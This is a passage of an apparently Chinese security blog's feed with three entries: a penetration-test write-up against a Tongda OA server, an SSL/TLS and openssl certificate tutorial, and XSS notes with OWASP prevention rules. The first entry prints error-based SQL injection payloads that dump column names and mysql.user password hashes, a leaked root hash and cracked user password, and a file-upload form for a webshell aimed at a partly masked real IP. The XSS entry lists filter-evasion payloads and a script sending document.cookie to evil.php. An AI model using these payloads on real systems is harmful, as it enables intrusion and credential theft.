class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">admin?' AND (<span class="keyword">SELECT</span> <span class="number">4909</span> <span class="keyword">FROM</span>(<span class="keyword">SELECT</span> <span class="keyword">COUNT</span>(*),</div><div class="line"><span class="keyword">CONCAT</span>(<span class="number">0x7171717071</span>,</div><div class="line">(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(column_name <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> INFORMATION_SCHEMA.COLUMNS <span class="keyword">WHERE</span> table_name=<span class="number">0x70617373</span> <span class="keyword">AND</span> table_schema=<span class="number">0x545241494e</span> <span class="keyword">LIMIT</span> <span class="number">0</span>,<span class="number">1</span>),<span class="comment">/*column_name列名,返回不止一个,用limit限制*/</span></div><div class="line"><span class="number">0x717a767071</span>,<span class="keyword">FLOOR</span>(<span class="keyword">RAND</span>(<span class="number">0</span>)*<span class="number">2</span>))x </div><div class="line"><span class="keyword">FROM</span> INFORMATION_SCHEMA.CHARACTER_SETS <span class="keyword">GROUP</span> <span class="keyword">BY</span> x)a)#</div><div class="line"><span class="comment">/*SQL MID() 函数用于得到一个字符串的一部分。这个函数被MySQL支持,但不被MS SQL Server和Oracle支持。在SQL Server, Oracle 数据库中,我们可以使用 SQL SUBSTRING函数或者 SQL SUBSTR函数作为替代。*/</span></div><div class="line"><span class="keyword">SELECT</span> <span class="keyword">MID</span>(ColumnName, <span class="keyword">Start</span> [, <span class="keyword">Length</span>])</div><div class="line"><span class="keyword">FROM</span> TableName</div></pre></td></tr></table></figure></p><p>–password 当前用户密码<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">admin?' AND (<span class="keyword">SELECT</span> <span class="number">7241</span> <span class="keyword">FROM</span>(<span class="keyword">SELECT</span> <span class="keyword">COUNT</span>(*),<span class="keyword">CONCAT</span>(<span class="number">0x7171717071</span>,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">password</span> <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> mysql.user <span class="keyword">LIMIT</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">0x717a767071</span>,<span class="keyword">FLOOR</span>(<span class="keyword">RAND</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">FROM</span> INFORMATION_SCHEMA.CHARACTER_SETS <span class="keyword">GROUP</span> <span class="keyword">BY</span> x)a)#</div></pre></td></tr></table></figure></p><p>current user: ‘root@127.0.0.1’<br>*91AF99F23C3D4ED85140D100433725DFA52BECEE</p><p>注入出的用户密码<br>张* $1$772.CR0.$dlecp6h5kiOsrVX6Id2BY1 ==> md5(unix) 594188</p><h4 id="GETSHELL"><a href="#GETSHELL" class="headerlink" title="GETSHELL"></a>GETSHELL</h4><p>通达OA后台getshell<br><a href="http://www.doc88.com/p-1334628630199.html" target="_blank" rel="external">http://www.doc88.com/p-1334628630199.html</a></p><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">form</span> <span class="attr">id</span>=<span class="string">"frmUpload"</span> <span class="attr">enctype</span>=<span class="string">"multipart/form-data"</span></span></div><div class="line"><span class="tag"><span class="attr">action</span>=<span class="string">"http://211.137.*.*/general/vmeet/privateUpload.php?fileName=555.php+"</span> <span class="attr">method</span>=<span class="string">"post"</span>></span></div><div class="line">Upload a new file:<span class="tag"><<span class="name">br</span>></span></div><div class="line"><span class="tag"><<span class="name">input</span> <span class="attr">type</span>=<span class="string">"file"</span> <span class="attr">name</span>=<span class="string">"Filedata"</span> <span class="attr">size</span>=<span class="string">"50"</span>></span><span class="tag"><<span class="name">br</span>></span></div><div class="line"><span class="tag"><<span class="name">input</span> <span class="attr">type</span>=<span class="string">"submit"</span> <span class="attr">value</span>=<span class="string">"Upload"</span>></span></div><div class="line"><span class="tag"><<span class="name">!–</span> <span class="attr">http:</span>//<span class="attr">192.168.56.139</span>/<span class="attr">general</span>/<span class="attr">vmeet</span>/<span class="attr">upload</span>/<span class="attr">temp</span>/<span class="attr">555.php.111</span> 这里是上传之后的网马–></span></div><div class="line"><span class="tag"></<span class="name">form</span>></span></div></pre></td></tr></table></figure>]]></content>
<summary type="html">
<h4 id="注入测试"><a href="#注入测试" class="headerlink" title="注入测试"></a>注入测试</h4><p>注入点,单引号被转义<br>POST <a href="http://211.137.*.*/logincheck.php"
</summary>
</entry>
<entry>
<title>SSL协议</title>
<link href="http://ruos.org/2015/04/08/SSL/"/>
<id>http://ruos.org/2015/04/08/SSL/</id>
<published>2015-04-08T14:56:29.000Z</published>
<updated>2020-08-26T11:02:51.467Z</updated>
<content type="html"><![CDATA[<p>术语:<br>SSL (Secure Socket Layer)安全套接字层协议<br>TLS (Transport Layer Security)传输层安全协议</p><h3 id="TLS协议"><a href="#TLS协议" class="headerlink" title="TLS协议"></a>TLS协议</h3><p><img src="https://blog.cloudflare.com/content/images/2014/Sep/keyless-comic-v1.gif" alt=""></p><p>第一步,爱丽丝给出协议版本号、一个客户端生成的随机数(Client random),以及客户端支持的加密方法。<br>第二步,鲍勃确认双方使用的加密方法,并给出数字证书、以及一个服务器生成的随机数(Server random)。<br>第三步,爱丽丝确认数字证书有效,然后生成一个新的随机数(Premaster secret),并使用数字证书中的公钥,加密这个随机数,发给鲍勃。<br>第四步,鲍勃使用自己的私钥,获取爱丽丝发来的随机数(即Premaster secret)。<br>第五步,爱丽丝和鲍勃根据约定的加密方法,使用前面的三个随机数,生成”对话密钥”(session key),用来加密接下来的整个对话过程。</p><p><img src="https://blog.cloudflare.com/content/images/2014/Sep/ssl_handshake_rsa.jpg" alt=""></p><p>Tip:<br>1,生成对话密钥一共需要三个随机数,第三个发出的随机数是用服务端公钥加密的,除了客户端知道和服务端能解密出来外其他人不知道。<br>2,握手之后的对话使用”对话密钥”加密(对称加密),服务器的公钥和私钥只用于加密和解密”premaster secret”(非对称加密),无其他作用。<br>3,服务器公钥放在服务器的数字证书之中。</p><p>Diffie-Hellman</p><p><img src="https://blog.cloudflare.com/content/images/2014/Sep/ssl_handshake_diffie_hellman.jpg" alt=""></p><p>curl -k <a href="https://www.baidu.com/img/baidu_jgylogo3.gif" target="_blank" rel="external">https://www.baidu.com/img/baidu_jgylogo3.gif</a></p><p>Wireshark</p><p>192.168.1.5 180.97.33.107 SSL Client Hello<br>180.97.33.107 192.168.1.5 TLSv1.2 Server Hello<br>180.97.33.107 192.168.1.5 TLSv1.2 Certificate, Server Key Exchange(服务端DH参数), Server Hello Done<br>192.168.1.5 180.97.33.107 TLSv1.2 Client Key Exchange(客户端DH参数), Change Cipher Spec, Encrypted Handshake Message<br>180.97.33.107 192.168.1.5 TLSv1.2 Change Cipher Spec, Encrypted Handshake Message</p><p>Curl -v 显示交互过程</p><p>* TLSv1.2 (OUT), TLS handshake, Client hello (1):<br>* TLSv1.2 (IN), TLS handshake, Server hello (2):<br>* NPN, negotiated HTTP1.1<br>* TLSv1.2 (IN), TLS handshake, Certificate (11):<br>* TLSv1.2 (IN), TLS handshake, Server key exchange (12):<br>* TLSv1.2 (IN), TLS handshake, Server finished (14):<br>* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):<br>* TLSv1.2 (OUT), TLS change cipher, Client hello (1):<br>* TLSv1.2 (OUT), TLS handshake, Unknown (67):<br>* TLSv1.2 (OUT), TLS handshake, Finished (20):<br>* TLSv1.2 (IN), TLS change cipher, Client hello (1):<br>* TLSv1.2 (IN), TLS handshake, Finished (20):<br>* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256</p><a id="more"></a><h3 id="证书生成"><a href="#证书生成" class="headerlink" title="证书生成"></a>证书生成</h3><p>openssl参数解析</p><p>-new:创建一个证书请求文件<br>-config<br>-extfile<br>-subj</p><p>1,自签名证书</p><p>生成私钥<br><code>openssl genrsa -des3 -out server.key 4096</code></p><p>去除key口令<br><code>openssl rsa -in server.key -out nokey_server.key</code></p><p>生成CSR<br><code>openssl req -new -key server.key -out server.csr -config openssl.cfg -subj "/C=CN/ST=SC/L=CD/O=CerTest/OU=CerTest/CN=www.mytest.com"</code></p><p>CN = baidu.com 通用名称<br>O = BeiJing Baidu Netcom Science Technology Co., Ltd 组织单位<br>OU = service operation department. 部门<br>L = beijing 城市<br>ST = beijing 省/州名<br>C = CN 国家/地区</p><p>生成自签名证书<br><code>openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt</code></p><blockquote><p>openssl生成私钥,通过私钥生成证书请求csr。权威证书机构通过证书请求文件给你生成cer证书。但自建CA可为自己的请求签发证书,当然这是不可信的。当将CA导入本地计算机“受信任的根证书颁发机构”后便认为该证书是可信的了。</p></blockquote><p>2,自建CA签发证书</p><p>Step1:生成根CA</p><p>a) 生成私钥ca.key<br><code>openssl genrsa -aes256 -passout pass:123456 -out ca.key 4096</code></p><p>b) 生成证书签名请求文件ca.csr<br><code>openssl req -new -key ca.key -out ca.csr -subj "/C=CN/ST=SC/O=CerTest/OU=Test Certificate Authority/CN=Test Root CA"</code></p><blockquote><p>openssl ca 伪命令会自动去找环境变量中的openssl.cfg配置文件</p></blockquote><p>c) 使用CA私钥自签发根证书<br><code>openssl x509 -req -days 3650 -sha256 -signkey ca.key -in ca.csr -extfile ca.cnf -extensions v3_ca -out ca.cer</code></p><p>ca.cnf配置文件<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">[ v3_ca ]</div><div class="line"># Extensions for a typical CA</div><div class="line">subjectKeyIdentifier=hash</div><div class="line">authorityKeyIdentifier=keyid:always,issuer</div><div class="line">basicConstraints = CA:true</div><div class="line">keyUsage = cRLSign, keyCertSign</div></pre></td></tr></table></figure></p><p>Step2:生成中间证书</p><p>a) 生成私钥inter.key<br><code>openssl genrsa -aes256 -passout pass:123456 -out inter.key 4096</code></p><p>b) 生成中级证书请求文件inter.csr<br><code>openssl req -new -key inter.key -out inter.csr -subj "/C=CN/ST=SC/O=CerTest/OU=Test Certificate Authority/CN=Test Intermedia CA"</code></p><p>c) 使用CA根证书签发中间证书inter.cer,该证书可以继续签发服务器证书。<br><code>openssl x509 -req -days 3650 -CAkey ca.key -CA ca.cer -in inter.csr -CAcreateserial -extfile inter.cnf -extensions v3_ca -out inter.cer</code></p><p>inter.cnf配置文件<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">[ v3_ca ]</div><div class="line"></div><div class="line"># Extensions for a typical CA</div><div class="line">subjectKeyIdentifier=hash</div><div class="line">authorityKeyIdentifier=keyid:always,issuer</div><div class="line"># 中间证书需添加,pathlen:0</div><div class="line">basicConstraints = CA:true,pathlen:0</div><div class="line">keyUsage = cRLSign, keyCertSign</div></pre></td></tr></table></figure></p><p>Step3:生成服务端证书请求文件</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">openssl genrsa -aes256 -passout pass:123456 -out server.key 4096</div><div class="line">openssl req -new -key server.key -out server.csr -subj "/O=CerTest/OU=Test Certificate Authority/CN=*.mytestx.com"</div></pre></td></tr></table></figure><p>Step3:用中间证书签发服务器证书<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">openssl x509 -req -days 365 -sha256 -CA inter.cer -CAkey inter.key -extfile server.cnf -extensions v3_req -CAcreateserial -in server.csr -out server.cer</div></pre></td></tr></table></figure></p><p>server.cnf配置文件<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">[ v3_req ]</div><div class="line"># Extensions to add to a certificate request</div><div class="line">basicConstraints = CA:FALSE</div><div class="line">keyUsage = nonRepudiation, digitalSignature, keyEncipherment</div><div class="line">nsCertType = server</div><div class="line">subjectAltName = @alt_names</div><div class="line"></div><div class="line">[ alt_names ]</div><div class="line"># 解决浏览器报错 NET::ERR_CERT_COMMON_NAME_INVALID</div><div class="line">DNS.1 = *.mytestx.com</div><div class="line">DNS.2 = mytestx.com</div></pre></td></tr></table></figure></p><blockquote><p>分别将ca.cer、inter.cer导入本地受信任的根证书颁发机构和中间证书颁发机构中。导入ca.cer后查看inter.cer显示是受信任了,再次导入中间证书server.cer才能被计算机信任。</p></blockquote><h3 id="OPENSSL-证书验证"><a href="#OPENSSL-证书验证" class="headerlink" title="OPENSSL 证书验证"></a>OPENSSL 证书验证</h3><p>查看证书<br>openssl s_client -showcerts -connect aa.mytestx.com:443</p><p>证书链验证<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">openssl verify ca.cer</div><div class="line">openssl verify -CAfile ca.cer inter.cer</div><div class="line">cat ca.cer inter.cer > ca_bundle.cer</div><div class="line">openssl verify -CAfile ca_bundle.cer server.cer</div></pre></td></tr></table></figure></p><p>Nginx配置HTTPS证书<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line">server {</div><div class="line"> listen 443 ssl;</div><div class="line"> server_name aa.mytestx.com;</div><div class="line"> ssl_certificate /demoCA/server.cer;</div><div class="line"> ssl_certificate_key /demoCA/nokey_server.key;</div><div class="line"> ssl_session_cache shared:SSL:1m;</div><div class="line"> ssl_session_timeout 5m;</div><div class="line"> ssl_ciphers HIGH:!aNULL:!MD5;</div><div class="line"> ssl_prefer_server_ciphers on;</div><div class="line"> location / {</div><div class="line"> root /nginx-1.14.0/html;</div><div class="line"> index index.html index.htm;</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure></p><p>ssl_certificate参数也可以配置bundle.cer,服务器将推送中间证书,防止某些客户端无法验证证书链。这里合并时需要注意前后顺序,服务器证书公钥在前,中间证书公钥在后。</p><p>cat server.cer inter.cer > bundle.cer</p><blockquote><p>客户端验证服务器证书时,首先检查该证书的颁发者,如中级颁发者,如果该中级证书文件不存在本地计算机内且无法联网下载时,则证书验证失败NET::ERR_CERT_AUTHORITY_INVALID;本地无中间证书或者推送的中间证书错误时,浏览器将尝试通过服务器证书中的“授权访问信息”属性去联网下载,但是安卓客户端和接口调用则无法自动下载将导致连接失败。如果服务器推送了中间证书,本地计算机内只含有根CA,也可通过验证。所以在某些SSL网关设备上,尽量根CA、中间证书和服务器证书都配置上。</p></blockquote><h3 id="代理"><a href="#代理" class="headerlink" title="代理"></a>代理</h3><p>转换成PKCS12格式供Burp使用<br><code>openssl pkcs12 -export -inkey server.key -in server.crt -out server.pfx</code></p><p><img src="http://i.imgur.com/RdLCQVe.png" alt=""></p><p>将CA导入受信任的根证书颁发机构后若火狐仍不信任则在火狐证书管理器中对其编辑信任。</p><p><img src="http://i.imgur.com/A3FSl0q.png" alt=""></p><p>Chrome https代理死活出错解决办法</p><p>Chrome -> Fiddler -> Burp</p><p>配置Fiddler Gateway指向Burp</p><p>Manual Proxy Configuration:<br><a href="http://127.0.01:8080" target="_blank" rel="external">http://127.0.01:8080</a></p><p>IOS导入并信任burp证书</p><p><img src="https://i.imgur.com/mmkXp9y.jpg" alt=""></p>]]></content>
<summary type="html">
<p>术语:<br>SSL (Secure Socket Layer)安全套接字层协议<br>TLS (Transport Layer Security)传输层安全协议</p>
<h3 id="TLS协议"><a href="#TLS协议" class="headerlink" title="TLS协议"></a>TLS协议</h3><p><img src="https://blog.cloudflare.com/content/images/2014/Sep/keyless-comic-v1.gif" alt=""></p>
<p>第一步,爱丽丝给出协议版本号、一个客户端生成的随机数(Client random),以及客户端支持的加密方法。<br>第二步,鲍勃确认双方使用的加密方法,并给出数字证书、以及一个服务器生成的随机数(Server random)。<br>第三步,爱丽丝确认数字证书有效,然后生成一个新的随机数(Premaster secret),并使用数字证书中的公钥,加密这个随机数,发给鲍勃。<br>第四步,鲍勃使用自己的私钥,获取爱丽丝发来的随机数(即Premaster secret)。<br>第五步,爱丽丝和鲍勃根据约定的加密方法,使用前面的三个随机数,生成”对话密钥”(session key),用来加密接下来的整个对话过程。</p>
<p><img src="https://blog.cloudflare.com/content/images/2014/Sep/ssl_handshake_rsa.jpg" alt=""></p>
<p>Tip:<br>1,生成对话密钥一共需要三个随机数,第三个发出的随机数是用服务端公钥加密的,除了客户端知道和服务端能解密出来外其他人不知道。<br>2,握手之后的对话使用”对话密钥”加密(对称加密),服务器的公钥和私钥只用于加密和解密”premaster secret”(非对称加密),无其他作用。<br>3,服务器公钥放在服务器的数字证书之中。</p>
<p>Diffie-Hellman</p>
<p><img src="https://blog.cloudflare.com/content/images/2014/Sep/ssl_handshake_diffie_hellman.jpg" alt=""></p>
<p>curl -k <a href="https://www.baidu.com/img/baidu_jgylogo3.gif" target="_blank" rel="external">https://www.baidu.com/img/baidu_jgylogo3.gif</a></p>
<p>Wireshark</p>
<p>192.168.1.5 180.97.33.107 SSL Client Hello<br>180.97.33.107 192.168.1.5 TLSv1.2 Server Hello<br>180.97.33.107 192.168.1.5 TLSv1.2 Certificate, Server Key Exchange(服务端DH参数), Server Hello Done<br>192.168.1.5 180.97.33.107 TLSv1.2 Client Key Exchange(客户端DH参数), Change Cipher Spec, Encrypted Handshake Message<br>180.97.33.107 192.168.1.5 TLSv1.2 Change Cipher Spec, Encrypted Handshake Message</p>
<p>Curl -v 显示交互过程</p>
<p>* TLSv1.2 (OUT), TLS handshake, Client hello (1):<br>* TLSv1.2 (IN), TLS handshake, Server hello (2):<br>* NPN, negotiated HTTP1.1<br>* TLSv1.2 (IN), TLS handshake, Certificate (11):<br>* TLSv1.2 (IN), TLS handshake, Server key exchange (12):<br>* TLSv1.2 (IN), TLS handshake, Server finished (14):<br>* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):<br>* TLSv1.2 (OUT), TLS change cipher, Client hello (1):<br>* TLSv1.2 (OUT), TLS handshake, Unknown (67):<br>* TLSv1.2 (OUT), TLS handshake, Finished (20):<br>* TLSv1.2 (IN), TLS change cipher, Client hello (1):<br>* TLSv1.2 (IN), TLS handshake, Finished (20):<br>* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256</p>
</summary>
<category term="blog" scheme="http://ruos.org/categories/blog/"/>
<category term="ssl,cer" scheme="http://ruos.org/tags/ssl-cer/"/>
</entry>
<entry>
<title>XSS</title>
<link href="http://ruos.org/2015/04/08/XSS/"/>
<id>http://ruos.org/2015/04/08/XSS/</id>
<published>2015-04-08T14:56:29.000Z</published>
<updated>2017-11-06T01:32:01.222Z</updated>
<content type="html"><![CDATA[<h1 id="Cross-site-Scripting-XSS-跨站脚本"><a href="#Cross-site-Scripting-XSS-跨站脚本" class="headerlink" title="Cross-site Scripting (XSS) 跨站脚本"></a>Cross-site Scripting (XSS) 跨站脚本</h1><p>恶意代码注入</p><h4 id="XSS-using-Script-in-Attributes"><a href="#XSS-using-Script-in-Attributes" class="headerlink" title="XSS using Script in Attributes"></a>XSS using Script in Attributes</h4><p>XSS attacks may be conducted without using <script></script> tags. Other tags will do exactly the same thing, for example:<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">body</span> <span class="attr">onload</span>=<span class="string">alert(</span>'<span class="attr">test1</span>')></span></div></pre></td></tr></table></figure></p><p>or other attributes like: onmouseover, onerror.<br>onmouseover<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">b</span> <span class="attr">onmouseover</span>=<span class="string">alert(</span>'<span class="attr">Wufff</span>!')></span>click me!<span class="tag"></<span class="name">b</span>></span></div></pre></td></tr></table></figure></p><p>onerror<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">"http://url.to.file.which/not.exist"</span> <span class="attr">onerror</span>=<span class="string">alert(document.cookie);</span>></span></div></pre></td></tr></table></figure></p><h4 id="XSS-using-Script-Via-Encoded-URI-Schemes"><a href="#XSS-using-Script-Via-Encoded-URI-Schemes" class="headerlink" title="XSS using Script Via Encoded URI Schemes"></a>XSS using Script Via Encoded URI Schemes</h4><p>使用编码绕过过滤 如:a=&#X41 (UTF-8)<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">IMG</span> <span class="attr">SRC</span>=<span class="string">j&#X41vascript:alert(</span>'<span class="attr">test2</span>')></span></div></pre></td></tr></table></figure></p><h4 id="XSS-using-code-encoding"><a href="#XSS-using-code-encoding" class="headerlink" title="XSS using code encoding"></a>XSS using code encoding</h4><p>We may encode our script in base64 and place it in META tag.</p><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">META</span> <span class="attr">HTTP-EQUIV</span>=<span class="string">"refresh"</span> <span class="attr">CONTENT</span>=<span class="string">"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg"</span>></span></div></pre></td></tr></table></figure><p>伪协议<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">a</span> <span class="attr">href</span>=<span class="string">"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="</span>></span>click<span class="tag"></<span class="name">a</span>></span></div></pre></td></tr></table></figure></p><h2 id="反射型XSS"><a href="#反射型XSS" class="headerlink" title="反射型XSS"></a>反射型XSS</h2><p>获取用户cookies</p><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">SCRIPT</span> <span class="attr">type</span>=<span class="string">"text/javascript"</span>></span><span class="undefined"></span></div><div class="line"><span class="javascript"><span class="keyword">var</span> adr = <span class="string">'../evil.php?cakemonster='</span> + <span class="built_in">escape</span>(<span class="built_in">document</span>.cookie);</span></div><div class="line"><span class="undefined"></span><span class="tag"></<span class="name">SCRIPT</span>></span></div></pre></td></tr></table></figure><a id="more"></a><h2 id="存储型"><a href="#存储型" class="headerlink" title="存储型"></a>存储型</h2><p>隐蔽性高</p><h2 id="DOM(Document-Object-Model)-XSS"><a href="#DOM(Document-Object-Model)-XSS" class="headerlink" title="DOM(Document Object Model) XSS"></a>DOM(Document Object Model) XSS</h2><p>动态修改html页面</p><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">body</span>></span></div><div class="line"><span class="tag"><<span class="name">script</span>></span><span class="undefined"></span></div><div class="line"><span class="javascript"><span class="built_in">document</span>.write(<span class="built_in">document</span>.location.href.substring(<span class="built_in">document</span>.location.href.indexOf(<span class="string">"default="</span>)+<span class="number">8</span>));</span></div><div class="line"><span class="undefined"></span><span class="tag"></<span class="name">script</span>></span></div><div class="line"><span class="tag"></<span class="name">body</span>></span></div></pre></td></tr></table></figure><p>The malicious script can be embedded in the URL as follows in two ways:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">http://www.some.site/page.html?default=<script>alert(document.cookie)</script></div><div class="line">or </div><div class="line">http://www.some.site/page.html#default=<script>alert(document.cookie)</script></div></pre></td></tr></table></figure><p>浏览器防护(自动URL编码)<br>%3Cscript%3Ealert(document.cookie)%3C/script%3E</p><h3 id="XSS-Ajax提交表单getshell"><a href="#XSS-Ajax提交表单getshell" class="headerlink" title="XSS Ajax提交表单getshell"></a>XSS Ajax提交表单getshell</h3><h2 id="XSS-Cross-Site-Scripting-Prevention-Cheat-Sheet"><a href="#XSS-Cross-Site-Scripting-Prevention-Cheat-Sheet" class="headerlink" title="XSS (Cross Site Scripting) Prevention Cheat Sheet"></a>XSS (Cross Site Scripting) Prevention Cheat Sheet</h2><p><a href="https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" target="_blank" rel="external">https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet</a></p><ol><li>仔细验证不可信数据</li><li>HTML实体编码 You MUST use the escape syntax for the part of the HTML document you’re putting untrusted data into.</li></ol><h4 id="XSS-Prevention-Rules"><a href="#XSS-Prevention-Rules" class="headerlink" title="XSS Prevention Rules"></a>XSS Prevention Rules</h4><p>RULE #0 don’t put untrusted data into your HTML document<br>RULE #1 HTML Escape<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">& --> &amp;</div><div class="line">< --> &lt;</div><div class="line">> --> &gt;</div><div class="line">" --> &quot;</div><div class="line">' --> &#x27; &apos; is in the XML and XHTML specs.</div><div class="line">/ --> &#x2F; forward slash is included as it helps end an HTML entity</div></pre></td></tr></table></figure></p><p>RULE #2 - Attribute Escape<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">name</span>=<span class="string">"fname"</span> <span class="attr">value</span>=<span class="string">"UNTRUSTED DATA"</span>></span></div></pre></td></tr></table></figure></p><p>RULE #3 - JavaScript Escape<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><script>var currentValue='UNTRUSTED DATA';</script></div><div class="line"><script>someFunction('UNTRUSTED DATA');</script> </div><div class="line"></div><div class="line">//编码</div><div class="line"><SCRIPT>alert("XSS")</SCRIPT> </div><div class="line">&lt;SCRIPT&gt;alert&#x28;&quot;XSS&quot;&#x29;&lt;&#x2f;SCRIPT&gt;</div></pre></td></tr></table></figure></p><ul><li>Ensure JavaScript variables are quoted</li><li>JavaScript Hex Encoding</li><li>JavaScript Unicode Encoding</li><li>Avoid backslash encoding (\” or \’ or \)</li></ul><p>RULE #4 - CSS Escape And Strictly Validate<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">div</span> <span class="attr">style</span>=<span class="string">"width: UNTRUSTED DATA;"</span>></span>Selection<span class="tag"></<span class="name">div</span>></span></div></pre></td></tr></table></figure></p><ul><li>CSS Hex encoding</li></ul><p>Except for alphanumeric characters, escape all characters with ASCII values less than 256 with the \HH escaping format.<br>RULE #5 - URL Escape<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><a href=<span class="string">"/site/search?value=<?php echo urlencode($_GET['url']) ?>"</span>>clickme</a></div></pre></td></tr></table></figure></p><p>RULE #6 - Sanitize HTML Markup<br>PHP Html Purifier - <a href="http://htmlpurifier.org/" target="_blank" rel="external">http://htmlpurifier.org/</a><br>RULE #7 - Prevent DOM-based XSS</p><p>Others<br>Use HTTPOnly cookie flag</p><h2 id="XSS-Filter-Evasion"><a href="#XSS-Filter-Evasion" class="headerlink" title="XSS Filter Evasion"></a>XSS Filter Evasion</h2><p><a href="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" target="_blank" rel="external">https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</a></p><ul><li>XSS Platform</li><li>XSS 编码</li><li>OWASP XSSER</li></ul><ol><li>编码</li></ol><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">URL编码 空格(%20)</div><div class="line">HTML实体编码 < (&lt;)</div><div class="line">字符编码 十进制、十六进制ASCII码或unicode字符编码 < (&#60;) >(&#62;)</div><div class="line">Js编码 < (u003c) >(u003e)</div><div class="line">CSS编码 \65</div></pre></td></tr></table></figure><p>HTML实体编码</p><table border="0" cellspacing="0" cellpadding="0"><br><tbody><br> <tr><br> <th style="width:20%">显示结果</th><br> <th style="width:20%">描述</th><br> <th style="width:30%">实体名称</th><br> <th style="width:30%">实体编号</th><br> </tr><br> <tr><br> <td> </td><br> <td>空格</td><br> <td>&nbsp;</td><br> <td>&#160;</td><br> </tr><br> 